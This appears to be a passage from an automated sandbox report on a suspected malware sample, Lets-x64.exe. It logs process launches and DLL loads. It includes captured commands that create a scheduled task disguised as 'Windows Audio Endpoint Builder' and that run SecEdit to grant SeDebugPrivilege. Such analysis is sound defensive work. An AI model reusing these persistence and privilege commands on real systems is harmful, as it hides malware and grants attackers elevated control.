                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\Lets-x64.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: lua5.1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: oledlg.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: actxprxy.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
